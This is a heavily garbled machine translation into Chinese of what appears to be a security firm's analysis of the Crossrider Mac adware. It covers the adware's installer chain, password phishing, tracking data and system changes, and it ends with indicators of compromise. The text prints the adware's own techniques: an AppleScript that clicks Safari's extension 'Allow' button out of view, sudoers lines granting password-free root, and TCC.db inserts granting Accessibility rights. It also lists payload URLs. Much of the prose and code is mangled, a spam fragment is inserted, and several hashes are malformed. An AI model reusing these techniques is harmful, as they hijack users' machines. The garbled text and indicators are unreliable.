作为在我们的恶意软件报告中显示的数据显示,MAC威胁正在上升,但它们与Windows用户不相同类型的威胁类型。最值得注意的是,更传统的恶意软件形式,例如勒索软件,间谍软件和后门占所有Windows威胁的27%以上。这一数字的Macs小于1%。
此外,Mac Malware整体不已。剩下的99%以上的Mac威胁是“只是”广告软件潜在不需要的程序(幼崽)。这导致了一些在MAC社区中解雇了这些发现不重要,甚至领导一个Mac博主写:
“Mac没有病毒”是一个仍然压倒性的陈述。
但是,广告软件和幼崽实际上可以在MAC上比“真实”恶意软件更具侵入性和危险性。它们可以拦截和解密所有网络流量,使用静态密码创建隐藏用户,使系统设置不安全更改,并且通常将其根部深入系统,以便完全消除它是非常具有挑战性的。
为了展示我们的含义,以下是对MacoS的宏论威胁最复杂的威胁的详细分析 - 是“只是广告软件”的威胁。
MAC广告软件安装
十字架,也被称为Bundlore.或冲浪者,由MalwareBytes作为广告服务器检测到.必威平台APPCrossrider。
品牌=(FlashMall Webshoppers WebShoppy Smartshoppy Shoptool ShoppyTool Coolshopper Easyshopper Liveshppers智能商店易商店Bestwebshppers Hotshoppy Bestsmartshpers Myshopmate Myshopbot Surfmate Surfbuyer优惠券机Shefpinizer Shopperify mycouponize myshopcoupon mycouponsmart)无论你称之为什么,它已经存在了至少六到七年,并且在那段时间内经常发挥作用。
从分析“Weknow”卸载程序的分析中找到了第一阶段安装程序,该分析包含到shell脚本的链接。(The name “weknow” comes from one of many websites used by this adware.) This shell script, which kicks off the entire installation process, consists of around 300 lines of code—a fairly modest script that doesn’t take long to download.
尽管它的尺寸相对较小,但脚本将打开深兔孔,下载和执行大量其他文件。Since much of the code that gets executed is downloaded, the exact payload of the adware can be changed at a moment’s notice, and can vary depending on all manner of variables, such as where you’re located, whether your machine has been seen before, what else is installed, etc. Further, should any of the various delivery servers be hacked by a more malicious actor, those scripts could be used to deploy more malicious payloads.
接下来,在进行简要跟踪数据收集并将其上传到服务器后,Crossrider从以下URL下载文件:
http://cdn.mycouponsmartmac.com/download/mac/installerresources/pwr.zip.
此文件扩展为名为的应用程序mm-install-macos.app.。此应用程序的唯一目的是通过显示假身份验证提示来对用户的密码进行PHOSH。密码返回到纯文本中的脚本,其中重复使用它以安装其余组件。
脚本下一步确定系统的版本,并在MacOS 10.11和更高版本上执行一组操作,另一组用于旧系统。
安装在10.11和UP上
在较新的系统上,压缩webtools.app.使用PHISHEAD密码下载和执行以作为root运行:
http://cdn.myshopcouponmac.com/download/mac/installerresources/wt.zip.
此应用程序掩盖了屏幕,在此期间它安装了大量文件。作为此过程的一部分,它还使Safari的副本进行了修改以在打开时自动启用某些Safari扩展,而无需用户操作。
虽然这些修改遗漏了Safari,但它可以用来验证除了创建者以外的人还没有修改应用程序,因为当实际检查这些代码签名时,麦斯科斯仍然会愉快地运行它。
完成此过程完成后,删除Safari的副本,留下Safari的真实副本,认为它已安装并启用若干额外的浏览器扩展。
安装在10.10及以上
在较旧的系统上,Crossrider下载以下文件:
http://dl.searchmine.net/download/mac/installerresources/unified/searchmine/imsearch.tar.gz.
这是提取的,并且是install.sh.执行它包含的脚本。此脚本仅有超过900行代码,它运行了许多其他脚本和进程,以更改Safari和Chrome设置并安装浏览器扩展。
在Safari的情况下,部分过程涉及一个Applescript,它使得可访问的辅助功能设置为所有控件提供键盘访问 - 以及然后使用该访问单击窗口Safari中的“允许”按钮在用户尝试安装Safari Extension时显示。
告诉应用程序“Safari”将Windows的界限设置为{0,0,-1000,-1000}告诉应用程序“系统事件”设置过程“Safari”的可见讲述应用程序进程“Safari”设置为True Log Forw“纸张1的按钮1“告诉窗口1告诉表格1单击按钮1延迟1结束告诉结束告诉
脚本屏蔽屏幕屏蔽窗口,因此用户在安装过程中没有看到任何此项发生。所有用户都可能看到Safari短暂打开然后关闭。
接下来,下载了本机MAC二进制文件(如应用程序,但意味着要从命令行而不是通过Finder执行):
http://service.macinstallerinfo.com/mac/getinstallscript/scripts/bin/iwt.bin.
在其他文件中,此过程将在执行时将组件安装到Applications文件夹中,然后运行近750行行李脚本以进行进一步的浏览器更改。
跟踪数据
在整个安装过程中,各种脚本和进程将重复将数据报告回多种跟踪服务器。这些交易发送潜在的敏感数据,例如:
- 计算机的唯一标识符
- IP地址
- 用户名
- MacOS版本
- Safari版本
- Chrome Version.
- 应用程序文件夹中找到的所有内容列表
- 所有已安装的代理和守护进程的列表
- 所有已安装的系统配置配置文件的列表
- 恶意软件删除工具的版本,伪装的安全组件,旨在删除某些已知的恶意软件
由于通过从多个服务器下载的脚本和进程获得了大部分数据,因此可以动态地收集所收集的确切数据以及它正在发送的位置。
更改系统
整个系统中有许多变化,其中一些危险且难以移除普通人。这使得Crossrider成为我在MACOS上见过的最具侵入性威胁之一。
系统配置配置文件
这些配置文件通常由IT管理员使用,以远程管理计算机来管理计算机。但是,还可以通过A手动安装配置文件.mobileconfig文件,并且广告软件确实如此。
安装的配置文件将主页锁定主页和搜索引擎设置在Safari和Chrome中,阻止用户更改,直到删除配置文件。
托管偏好
托管首选项是用于更改由IT管理员管理的设置的另一种方法。在较旧的系统上,广告软件将托管首选项文件设置为与广告软件关联的页面设置Chrome的首选项。
更改sudoers文件
在基于UNIX的系统上,与MACOS一样,具有HIGEST级别的权限的用户是root用户。在这样的系统上,sudoers.文件是一个识别允许哪些用户具有root级访问的文件以及它们如何允许才能获得它。
Crossrider广告软件对sudoers.文件在多个地方。在一个中,添加行以允许在当前用户帐户运行时具有root权限的几个已安装的进程:
Quereuser all = nopasswd:seteNv:/用户/ Quermaceer / applications / myMacuptate / MyMacuptate SomeUser all = nopasswd:seteNv:/用户/某种用户/应用程序/ UptodateMac / UptodateMac
在某些情况下,安装过程会击中障碍,并无法正确编写这些更改,这使得sudoers文件使得干扰获取root权限的能力。这可能会影响软件安装ABD排除故障的能力,并且很难修复。(为了解决这个问题sudoers.文件,您必须具有root访问权限,您无法获得,因为sudoers.文件被打破 - 它是一个catch-22。)
在安装过程的其他部分中,广告软件为用户提供了运行的所有进程,无需密码就可以无限制地访问root。脚本尝试恢复这些更改,但可能并不总是成功(例如脚本或流程崩溃)。
quereuser all =(全部)nopasswd:全部
这些更改可能被其他恶意软件劫持。例如,如果一块恶意软件是覆盖第一个示例中的MyMacioCupt或UptodateMac进程(这不需要特殊访问),则可以升级到root才能做更多的损坏。在后一种例子中,任何进程都能够无条件地提升根目录。
TCC.DB.
在几个地方,安装过程将尝试修改TCC.DB数据库。该数据库识别用户给出了不同进程的权限,例如应用程序是否可以访问您的日历,联系人,计算机的麦克风,网络摄像头或某些文件夹。
此广告软件尝试为自己提供宽带的其他进程,最强大的功能之一:Accessibility Accession之一。此许可允许这些过程来控制其他过程,该过程可用于捕获敏感数据等。
如果[[$ {OSXVER}“== *”10.11“*]] ||[[“$ {osxver}”== *“10.12”*]];然后/ usr / bin / sqlite3 << eof.enen' $ {tccdb}'插入或替换为访问值('ktccserviceacecesitibility','com.apple.terminal',0,1,1,null,null);...插入或替换为访问值('ktccserviceacicesibility','/ bin / bash',1,1,1,null,null);插入或替换为访问值('ktccserviceaciceSibility','/ bin / sh',1,1,1,null,null);插入或替换为访问值('ktccserviceaceCesisibility','/ usr / bin / sudo',1,1,1,null,null);插入或替换为访问值('ktccserviceaceCessibility','$ {tmpdir} /。tmpma / instaloffers.sh',1,1,1,null,null);插入或替换为访问值('ktccserviceacicesitibility','com.stubberify.mym',0,1,1,null,null);插入或替换为访问值('ktccserviceAccesisibility','com.tostubornot.mym',0,1,1,null,null);插入或替换为访问值('ktccserviceAccescesitibility','com.trustedmac.service',0,1,1,null,null);插入或替换为访问值('ktccserviceAccescessibility','com.autobots.transform',0,1,1,null,null);插入或替换为访问值('ktccserviceAccescessibility','com.mm-install-macos.www',0,1,1,null,null); insert or replace into access values('kTCCServiceAccessibility','com.mm-installer-macos.www',0,1,1,NULL,NULL); .quit EOF fi这仅适用于旧系统,因为TCC.DB文件由最近版本的宏上的系统以外的任何内容。但是,在较旧的系统上,这可以提供强大的权限,可以通过未来广告软件的更新或恶意软件才能抵消其对用户数据的访问权限的强大权限。
浏览器扩展
若干浏览器扩展是为Safari或Chrome或两者安装的,具体取决于Safari和Chrome的版本和版本的版本。这些扩展为广告软件提供了更大的能力来控制浏览器的行为。
通常,添加浏览器扩展要求用户确认,用于表达目的,以防止广告安装浏览器扩展名的广告软件或恶意软件。但是,此广告软件使用许多阴暗的技巧 - 例如先前提到的Safari的修改后副本 - 未经用户批准它们的用户,甚至需要安装这些扩展。
浏览器扩展可以从浏览器中收集信息的侵入性信息:基本上,任何可能在网站上显示的数据或在网站上输入的表单。后者可以包括敏感数据,例如用户名,密码和信用卡号。
发射代理和守护进程
发布代理和守护进程为流程持续运行的过程中最常见的方法之一。Crossrider Adware安装多个代理或守护程序,具体取决于正在安装的文件。幸运的是,这些非常容易找到人知识渊博的人 - 实际上,他们是技术可能寻找的第一件事之一 - 并且相对容易删除。
恶意软件必须更糟糕,对吗?
幸运的是(或不幸的是,取决于你的看法),没有。对比的Crossrider广告软件与一些国家恶意软件,例如由北韩国的拉撒路集团或越南创造的Maldware所做的恶意软件。此类恶意软件通常安装单个启动代理或守护进程,可容易地由看机器的任何专家察觉。Crossrider的安装过程远远超过了这些形式的恶意软件的复杂性。
MAC恶意软件往往不太复杂。当然,这并不意味着它不可能是危险的,而是现在,它坐在恶意软件的屁股桌上。简单地说:它不是复杂的,因为它不一定是。如果您是MAC用户感染恶意软件,则可能不会出现任何向外症状。
相比之下,广告软件非常明显,因为它会改变计算机的行为,最通常是您的Web浏览器。出于这个原因,Mac广告软件必须超越Mac恶意软件,并且已经成为远行且越来越难以摆脱。
什么是外带?
虽然许多MAC专家都喜欢将广告软件视为一个非问题,但是由于用户疏忽,大多数最大的数据泄露和破坏Windows机器的损坏造成的赎金软件攻击时,只会感染者只会受到感染。在互联网上,通过网络钓鱼电子邮件打开恶意链接,或者及时无法修补软件。
广告软件是Mac-and Windows和Android操作系统上的不断增长的问题。对于消费者和企业来说,这是全球所有地区的最普遍的威胁。我们看到一些Mac广告软件实际上比2019年大多数Windows威胁更普遍。
更糟糕的是,这些广告软件感染通常比恶意软件感染更严重,打开潜在的安全漏洞,可以通过更具恶意的威胁来利用,并证明艰巨以摆脱。此外,Mac上的广告软件也通常拦截和解密所有网络流量,使用已安装文件的随机生成的名称,使用分析避免技术来防止研究人员分析它们,在具有已知密码和更多的系统上创建隐藏用户。
总而言之,如果我不得不在一个或另一个之间做出选择,我会愿意在我对Mac广告软件做同样的情况之前,我会衷心感知我自己的机器。Mac Malware经常让我笑。Mac Adware有时会给我发冷。
IOC.
以下妥协指标与此广告有关。
域名
http://www.weknow.ac http://*.searchmine.net http://client.mm-bq.host http://service.macinstallerinfo.com http://*.macmymacupdater.com http://*.mycouponsmartmac.com http://*.myshopcouponmac.com http://*.mycouponizemac.com http://*.shopperifymac.com http://*.shoppinizermac.com http://*.couponizermac。com http://*.surfbuyermac.com http://*.surfmatemac.com http://*.myshopbotmac.com http://*.myshopmatemac.com http://*.bestsmartshoppersmac.com
文件
searchmine.sh. |
441FA62645591B2AA1B853EBFA51FE5BB36E6464AD3A 4F58A0B8297BEA851D9 |
mm-install-macos |
EE94315A1099A982A2B61878A64EE6FE9134E544CDCAE565995948A8CA843E51 |
WebTools. |
888A1F9DFADDE892496A321414CEB2A5A62A3997381BA6DBCD4E741D033352FD31 |
imsearch.tar.gz. |
E07C9E59F7621EEAD7300CFFE264A2D24A7749D592D8A2B32C48125EADF293F08 |
install.sh. |
591919F7B5CED77431990E7E9F257CE049F1FB2F93E9CDCB19B5400060518031 |
iwt.bin. |
168D9C1A06AB3F633E6FC724834AD8A9F4DC3C71945A34342347CE0DF042A361 |
gui_scripting.sh. |
DF402CF21E5F78E55050D7EE14C050869D4775FAAEB58AB841F5992A0638A4A9F |
installsafariextension. |
212A954A7B67E851063DAA2ACABE841E8E54A4C29CA4F1FC096A160F1764AA14 |
installsafarihpnt. |
18B449B7D25733557D305B8A8AE9B331E628C892996A83A39CB74BF2A7ECA9A |
update_legacy_chrome.py. |
B5AC18D3EA66DFAD4BAF02EFAD1A2F27F8134A2CD0F3C1D78E44D49BED613064 |
updatePreferences.py.py. |
6180666302BBF8032801D0AEC6DF08FBD27349C9D628F3A3DD7295256BF751B6 |
感谢Aditya Raj DAS查找样品并协助分析!
评论